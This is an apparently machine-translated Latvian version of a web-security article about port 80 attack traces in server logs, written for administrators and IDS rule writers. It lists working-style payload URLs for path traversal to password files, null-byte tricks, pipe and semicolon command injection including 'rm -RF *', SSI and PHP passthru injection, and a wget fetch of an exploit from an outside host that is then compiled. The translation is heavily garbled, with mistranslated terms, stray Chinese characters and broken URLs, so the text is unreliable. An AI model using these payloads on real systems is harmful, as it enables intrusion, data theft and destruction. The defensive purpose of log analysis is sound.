I. Kopsavilkums
II. Detalizēts apraksts
III. Turpmāka
IV. Ciešā saikne analīze
V. Transcoding
VI. Secinājumi
[Kopsavilkums]
tīmekļa vietnē 80 kā noklusējuma pakalpojumu portu, uz dažādiem drošības problēmas glabā to no atbrīvošanu, daži no šiem ievainojamības ļauj uzbrucēju iegūt pat sistēmas administratora atļauju iebraukt vietā pati, šādu Zenomorph portu 80 uzbrukumi dažas pēdas pētniecības, un pateiks, kā atrast problēmu no log ierakstus.
[Detaļas]
Šeit daļēji izmantojot vairākas of Liezi displeja tīmekļa serveriem un pieteikumu par viņu vispārējo uzbrukumu, un tās pēdas, kas ir tikai Liezi uzbrukumu, saraksta nav no jebkāda uzbrukuma šī sadaļa tiks sīku aprakstu par lomu katra uzbrukuma, un kā to izmantot, lai uzbruktu nepilnības.
(1) "." ".." Un "..." pieprasījuma
Pēdas šie uzbrukumi ir ļoti bieži tīmekļa lietojumprogrammas un Web serveris, ko izmanto, lai ļautu uzbrucēju vai worm-virus programmu, lai mainītu web servera ceļu, lai piekļūtu slēgtajām zonām. Lielākā daļa CGI programmas, ar šiem trūkumiem, ".." pieprasījums.
Piemērs:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Tas liecina par uzbrucēju Liezi pieprasījuma mosd šo failu, ja uzbrucējs spēju izrāvienu tīmekļa servera saknes direktoriju, tad iegūt plašāku informāciju un saņemt papildu privilēģijas.
(2) "% 20" pieprasījuma
% 20, ir hex vērtību, 16 vietas, lai gan tas nenozīmē, varat izmantot jebko, bet, kad jūs apskatīt log atradīs to, kādu web servera lietojumprogrammas darbojas uz šo raksturu var efektīvi īstenot Tāpēc jums vajadzētu uzmanīgi pārskatīt log. No otras puses, pieprasījums dažreiz var palīdzēt veikt dažas komandas.
Piemērs:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
Šī Liezi parāda uzbrucēju izpildīt UNIX komandas, uzskaitot visu katalogu pieprasīto dokumentu, izraisot uzbrucējs piekļūt svarīgi failus uz jūsu sistēmas, lai palīdzētu viņam turpmāk nodrošināt apstākļus, lai iegūtu privilēģijas.
(3) "% 00" pieprasījuma
% 00 teica 16-baitu heksadecimālo tukšs, viņš varēja nerrs tīmekļa lietojumprogrammu, un prasa dažāda veida failus.
Piemēri:
http://host/cgi-bin/lame.cgi?page=index.html
Tas var būt derīga pieprasījumu mašīna, ja uzbrucējs informēta par šo lūgumu bija veiksmīga, viņš turpinās meklēt CGI procedūrām.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Varbūt CGI programma nepieņem šo pieprasījumu, jo tas ir lūgums, lai pārbaudītu faila nosaukumu piedēkli, piemēram: html.shtml vai cita veida failus. Lielākā daļa programmas, jums pateiks, pieprasītā faila tips nav derīgs, šoreiz tas pateiks uzbrucēju pieprasa failam jābūt raksturs faila tips piedēkli, lai uzbrucējs var iegūt sistēmas ceļš, faila nosaukumu, kā rezultātā Jūsu sistēma jutīgāki informācija
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Uzmanību uz šo lūgumu, tā pievilt cgi programma, ka šis dokuments ir noteikt pieņemamu failu tipus, dažas lietojumprogrammas pārbaudiet derīgs, jo stulba pieteikuma dokumentāciju, ko parasti izmanto metodi uzbrukums.
(4) "|" pieprasījums
Tas ir caurule raksturs, jo UNIX sistēmā, lūgums pēc palīdzības, lai īstenotu vairākas sistēmas komandas vienlaicīgi.
Piemērs:
# Cat access_log | grep-i ".."
(Šī komanda parādīs žurnālā ".." pieprasījumu, ko parasti izmanto uzbrukumu un tārpi atrasts)
Bieži vien, ka daudzi tīmekļa lietojumprogrammas izmantot šo raksturu, tas arī izraisa viltus trauksmes, kas IDS žurnālos.
Jo Rūpīga savu pieteikumu, lai iespēju samazināt viltus trauksmes ir ielaušanās atklāšanas sistēmu.
Šeit ir daži no Lieh-tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Šis pieprasījums komanda, turpmāk ir dažas izmaiņas Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-al% 20/etc |
Šis pieprasījums ir uzskaitīti UNIX sistēmas / etc direktoriju visus failus
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep% 20-i% 20 "klibs"
Pieprasījuma kaķu un grep komanda komandu īstenošana tiks īstenoti, izbraukšana "klibs"
(5) ";" pieprasījums
Kas UNIX sistēmām, tas raksturs ļauj vairākas komandrindas izpildei
Piemērs:
# Id, uname-
(Īstenošana id komanda, kam seko īstenošanas uname komandu)
Daži tīmekļa programma ar šo raksturu, var izraisīt jūsu IDS žurnālos brīdinājuma neizdodas, jums vajadzētu rūpīgi pārbaudīt savu interneta programmu, lai jūs samazināt risku neveiksmes IDS brīdinājumiem.
(6) " " un " " pieprasījums
Vajadzētu pārbaudīt savu baļķi ieraksts divas rakstzīmes, vairāku iemeslu dēļ, pirmais ir rakstzīme, kas pievienoti datu dokumentā
Piemērs 1:
# Echo "jūsu hax0red H0 H0" / etc / motd (motd pieprasījumu rakstiska informācija šajā dokumentā)
Uzbrucēju var viegli izmantot pieprasījumu, kā minēts iepriekš manipulācijām ar jūsu mājas lapā. Piemēram, slavenā RDS izmantot uzbrucējs bieži lieto, lai mainītu mājas lapā.
Piemērs 2:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html jūs ievērosiet, ka apzīmējumu valodu šeit, viņš arī pavadīja " "," " rakstzīmes, piemēram, uzbrukumi nevar izraisīt uzbrucējs piekļuvei sistēmai, tas mulsina cilvēki, domāju, ka tas ir likumīgs mājas lapā informāciju (kas noved pie Cilvēki, apmeklējiet šo saiti, lai apmeklētu uzbrucējs noteikt adresi, šis pieprasījums var tikt kodēts uz 16 hex rakstzīmes veidā, lai pēdas uzbrukums nav tik acīmredzama)
(7) "" pieprasījums!
Kopīgu valodu par šo rakstzīmi pieprasījuma SS (Server Side Include) I uzbrukuma, ja uzbrucējs ir uzbrucējs sajaukt lietotājs noklikšķina uz saites, kas un kā iepriekš paši.
Piemērs:
http://host1/something.php =
Lieh-tcu ir uzbrucējs var darīt to failu uz vietas host2 no host1 parādās virs (protams, prasa apmeklētāju apmeklēt uzbrucēja savienojuma uzstādījumus. Šo pieprasījumu var pārveidot 16 hex kodējumu maska, nav viegli atrast)
Vienlaikus šāda pieeja var arī izpildīt komandu iestāde mājas lapā
Piemērs:
http://host/something.php =
Lieh-palaist uz tālvadības sistēma "id" komandu, tas būs redzams mājas lapā lietotāja id, parasti ir "neviens" vai "www"
Šī veidlapa ļauj iekļauti slēptos failus.
Piemērs:
http://host/something.php =
Slēptos failus. Htpasswd netiks rādīta, Apache atteiksies, lai izveidotu šādus noteikumus. Ht pieprasījuma veidlapu, un SSI logotips būs apvedceļš šos ierobežojumus, un radīt drošības problēmas
(8) "," pieprasījums
Uzbrukums izmantot attālo interneta pieteikumu mēģināja ievietot PHP programmas Zhong procedūrām, kas var ļaut izpildīt rīkojumu, kas atkarīgs no servera iestatījumus, un citas ar darbu no vairākiem faktoriem (Biru php drošais režīms iestatīts uz Wei)
Piemērs: http://host/something.php = passthru ("id ");?
Jo dažus vienkāršus php pieteikumu, tas var būt tīmekļa vietne uz tālvadības sistēmas lietotāju tiesības, lai veiktu vietējo komandu
(9) "" "pieprasījums
Šī rakstzīme vēlāk izmanto, lai izpildītu komandas perl, jo tīmekļa lietojumprogrammu rakstzīmes netiek bieži izmantota, tādēļ, ja jūs redzēt to savā žurnālā, jābūt ļoti uzmanīgiem
Piemērs:
http://host/something.cgi = `id`
Uzrakstiet Perl cgi attiecīgās programmas izraisītu īstenošanu id komandu
[Turpināt]
Nākamajā sadaļā apspriedīs īstenot vairāk uzbrukumu varēja komanda kopā ar prasītajiem dokumentiem, un ja jums ir attālinātas komandas izpildes trūkums, tas būtu kā pārbaudīt atklājums. Šī daļa ir tikai sniegt jums laba ideja, un pastāstītu jūsu sistēma, kas notiek, attackers mēģināt uzbrukumu jūsu sistēmai pēdas, bet nav uzskaitītas visas no uzbrucēju izmantot komandas un pieprasījumiem.
"/ Bin / ls"
Šī komanda lūdz visu ceļu, jo daudzās interneta pieteikumi ir šo nepilnību, ja jūs piesakieties daudzās vietās šādu pieprasījumu, ir iespējams lielā attālo izpildi komandu neaizsargātību, bet ne vienmēr ir problēma var būt arī viltus trauksmes. Vēlreiz atgādināja, web rakstisku iesniegumu (cgi, asp, php ... utt) ir drošības pamats
Piemērs:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
Tas ir logi čaumalas, ja uzbrucējs piekļūt un palaist šo skriptu servera uzstādījumus apstākļos atļauta logi mašīna var darīt jebko, daudz tārpu ir caur 80 portu, komunikācija ar attālo mašīna
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
Šis ir divu bināro failu, tās problēmas un / bin / ls, piemēram, ja jūs piesakieties daudzās vietās šādu pieprasījumu, ir iespējams lielā attālo izpildi komandu neaizsargātību, bet ne vienmēr ir problēma var būt arī viltus trauksmes.
Tas norāda, kuras daļas pieder, kas lietotājiem un grupām,
Piemērs:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Šī komanda var izdzēst failus bez pareiza lietošana ir ļoti bīstama
Piemēri:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-RF% 20 * |
http://host/cgi-bin/bad.cgi?doh=rm% 20-RF% 20 *;
"Wget un TFTP" komandu
Šīs komandas bieži uzbrucējs var iegūt papildu privilēģijas, lai lejupielādētu failus, wget ir UNIX komanda ar var izmantot, lai lejupielādētu backdoors, TFTP ir zem komandu UNIX un nt, tiek izmantota, lai lejupielādētu failu. Daži IIS tārpi izplatīšanos sevi ar TFTP nokopēt vīrusu citiem saimniekiem
Piemēri:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// uzņēmēja / cgi-bin / bad.cgi doh = wget% 20http?: / / www.hwa-security.net/Phantasmp.c;
"Kaķis" komandu
Šī komanda tiek izmantota, lai apskatītu failu saturu, ko bieži lieto, lai uzzinātu svarīgu informāciju, piemēram, konfigurācijas failus, paroles faili, kredīta failus un dokumentus, ko varat iedomāties
Piemēri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? doh = kaķis% 20/etc/motd;
"Echo" komandu
Šo komandu izmanto, lai rakstītu datus failā, piemēram, "index.html"
Piemēri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "FC-# kivi% 20was% 20here"% 20 % 200day.txt | http://host/cgi-bin/bad.cgi?doh=echo% 20 "FC-# kivi% 20was% 20here"% 20 % 200day.txt;
"Ps" komandu
Saraksti pašlaik darbojas process, pastāstiet uzbrucēju ka attālo uzņēmēja darbības programmas, lai gūtu priekšstatu par drošības jautājumiem, lai iegūtu turpmāku atļauju
Piemēri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi doh = ps% 20-aux?;
"Kill un killall" komandu
Unix sistēmās, lai nogalinātu šo procesu, uzbrucējs var izmantot šo komandu, lai apturētu sistēmas pakalpojumu un procesu, var arī izdzēst pēdas uzbrucējs, daži izmantot radīs daudz bērnu procesu
Piemēri: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"Uname" komandu
Šī komanda stāsta uzbrucējs attālā mašīna vārdu, kādu laiku, izmantojot šo tīmekļa vietni, lai zināt, kuras ISP, uzbrucējs, kurš var apmeklēt šodien. Uname-pieprasīt parasti tās iegrāmato log failu
Piemēri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20 | http://host/cgi-bin/bad. cgi? doh = uname% 20;
"Kopija GCC, Perl, python, utt ..." apkopošanu / interpretāciju komandu
Uzbrucējs, izmantojot wget un TFTP lejupielādēt izmantot, un izmantot cc, GCC kompilators, lai apkopotu to vērā izpildāmā programma, un papildu piekļuves privilēģijas
Piemēri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? doh = gcc% 20Phantasmp.c,. / a.out% 20-p% 2031337;
Ja jūs apskatīt apaļkoku atrodama "perl" python "Šos norādījumus var attālo uzbrucēju lejupielādēt perl, python skriptu, un mēģināja iegūt privilēģijas vietējo
"Pasts" komandu
Uzbrucēji bieži izmanto šo komandu sistēmu, daži svarīgi dokumenti uzbrucēja paša pastkasti, bet arī vēlas, lai e-pasta bumbu uzbrukumi tiek veiktas
Piemēri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh, utt ..." un citi komandas
Unix sistēmās, lai ļautu tiem mainīt faila atļaujas
chown = ļauj noteikt faila īpašniekam chmod = ļauj noteikt faila atļaujas chgrp = ļauj īpašniekam mainīt grupas atļaujām failiem chsh = atļauts mainīt lietotāja korpusa
Piemēri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? doh = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" fails
Šis ir sistēmas paroles failu, parasti ēnu off, un neļauj redzēt šifrētu paroli, bet uzbrucēju, kas var zināt, kas ir derīgu lietotāja un sistēmas absolūto ceļu, vietnes nosaukums un citu informāciju, kā parasti ar ēnu off, tāpēc uzbrucējs parasti redzēt / etc / ēna failu
"/ Etc / master.passwd"
Šis fails ir BSD sistēmas paroles failu, kas satur šifrētu paroli, uz root konta fails ir tikai lasāms tikai, un daži mazkvalificēti uzbrucēji atklāja viņa mēģinājums nolasīt saturu iekšpusē., Ja tīmekļa vietnē ir root privilēģijas, lai palaistu, tad uzbrucējs ir, mēs varam izlasīt satura iekšpusē, daudz problēmu sistēmas administrators nāks viens pēc otra
"/ Etc / ēna"
Satur šifrētu paroli, sistēma, izlasiet paši par root kontu, un / et / master.passwd gandrīz
"/ Etc / motd"
Kad lietotāji ieiet UNIX sistēmā, informācija, šķiet, "Message of the day" failu, tas sniedz svarīgu sistēmas informāciju un dažu kopumu, lietotājiem, kuri vēlas, lai tiem, kas nav lietotāji administrators, satur arī sistēmas versijas informācija, uzbrucējs parasti redzēt šo failu, lai saprastu, kas sistēma darbojas uzbrucējs, nākamais solis ir meklēt šāda veida sistēmas, izmantot, un papildu piekļuvi sistēmai privilēģijas
"/ Etc / mājotne"
Dokuments sniedz IP adreses un tīkla informācijas, uzbrucējs var uzzināt vairāk par Tīkla iestatījumi
"/ Usr / local / apache / conf / httpd.conf"
Tas ir Apache tīmekļa servera konfigurācijas failu, uzbrucējs var saprast, piemēram, CGI, SSI un cita informācija ir pieejama
"/ Etc / inetd.conf"
Tas ir konfigurācijas fails inetd pakalpojums, uzbrucējs var mācīties attālā mašīna, sākt šos pakalpojumus, vai izmantot iesaiņojuma piekļuves kontrole, ja aptinums tika konstatēts darbojas, uzbrucējs nākamais solis būs pārbaude "/ etc / hosts.allow" un "/ etc / hosts.deny", fails, un kas var mainīt dažus uzstādījumus, piekļuves privilēģijas
". Htpasswd. Htaccess, un. Htgroup"
Šie faili parasti tiek 在 mājas lapa tiek izmantota, lai autentificētu lietotājus, uzbrucējs varētu apskatīt šos failus, un saņemt lietotāja vārdu un paroli, parole failus. Htpasswd kas ir kodētas, izlauzties cauri dažas vienkāršas atšifrēšanu process ļauj attackers piekļūt vietnes aizsargājamās teritorijas (parasti lietotājs ar tādu pašu lietotāja vārdu un paroli, uzbrucējs var pat apmeklēt citu kontu)
"Access_log un error_log"
Tie ir apache servera log faili, uzbrucēji bieži vien apskatīt šos failus, pēc šiem lūgumiem meklēt tiek reģistrēti, tiem un citiem pieprasījumiem dažādām vietām
Parasti, uzbrucējs var modificēt šos log failus, piemēram, savu adresi, uzbrucējs pauze caur portu 80 uz jūsu sistēmas, un jūsu sistēma arī nav dubl darbu, neviens cits karšu sistēmu 状况 reģistrācijas procedūras, kas ielaušanās atklāšanas kļūst ļoti grūti strādāt
"[Drive-vēstules]: winntrepairsam._ vai [diska burtu]: winntrepairsam"
Windows NT sistēma paroles failu, ja tālvadības komandas nav iespējams īstenot, uzbrucēji parasti pieprasa šos dokumentus, tad "l0pht kreka" tipa paroli krekinga instrumentus, lai kreka, ja uzbrucējs mēģina uzbrukt administratora paroli failu, ja veiksmīga tad attālo mašīna būs uzbrucējs iegūst kontroli
[Pārplūdes analīze]
Šajā rakstā es neteikšu pārāk daudz par pārplūdi, tēmu, es dos, kādi tie parādībām un pēdas ievērības cienīgas un īpašas bažas, buferi bieži uzbruka uzbrucējs koda konversiju, un grūti atrast citus veidus, lai sasniegtu
Te ir vienkārša Lie Zi
Piemērs: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Šī Liezi parāda uzbrucēju par pieteikumu, lai nosūtītu daudz rakstura, lai pārbaudītu programmas bufera pārpildes, bufera pārpildes var iegūt attālo komandu izpildei uzņēmēja atļauju, ja īpašnieks ir Setuid un procedūras saknes, ar pārplūdi, varētu piekļūt visu sistēmu, ja nepatīk Setuid programmu, tad pārplūdes ir tikai darbojas tīmekļa vietne lietotāja tiesības
Šeit nevar pateikt visus apstākļus, bet jums vajadzētu regulāri pārbaudīt savu log failu, ja šī diena pēkšņi atklāju daudz pieprasījumu, bet parasti ne vairāk par pieprasījumu, tas nozīmē, ka jums ir pakļauti pārpildes uzbrukumiem, protams, var arī jauna tīkla tārpa uzbrukums
[Transcoding]
Visi uzbrukumi iepriekš minēto pieprasījumu, uzbrucējs parasti zina IDS sistēmas bieži mehāniskās pārbaudes pieprasījuma, parasti uzbrucējs izmantos datus pārrēķina līdzeklis, lai pārvērstu pieprasītā satura formāts 16 joslu, kā rezultātā IDS būs ignorēt šos pieprasījumus, Mēs esam iepazinušies ar CGI neaizsargātību skenēšanas rīks, kas ir labs Liezi ūsas. Ja jūs apskatīt log laika konstatēja lielu skaitu 16-band, nevis dažas kopīgas īpašības, tad uzbrucējs var mēģināt izmantot dažus no veidiem, kā uzbrukums jūsu sistēmas
Ātrs veids ir jūsu log fails lūgumu šos 16 hex, kopēt to uz jūsu pārlūkprogrammu, pārlūkprogramma var pārvērst tiesības pieprasīt, un parādīts pieprasījuma saturu, ja Jums nav drosme uzņemties šo risku, vienkāršs cilvēks ASCII, var nodrošināt jūs ar pareizo kodu.
[Nobeigums]
Šis raksts nevar ne aptvert visas 80 ostas no uzbrukuma, bet lielākā daļa no tiem ir minēts vairāk nekā vispārējs uzbrukums, un pateiks, kā pārbaudīt jūsu log failiem, un to, kā pievienot, piemēram, IDS noteikumu skaitu, rakstiet viņas mērķis ir web sistēmas administrators ir bažas par to, kas ir laba ideja tajā pašā laikā, es ceru, ka šo rakstu palīdz web programma web izstrādātājiem rakstīt labāk programmām
OF PIEZĪME: Ja jums ir kādi komentāri un ierosinājumi, lūdzu, sūtiet e-pastu admin@cgisecurity.com.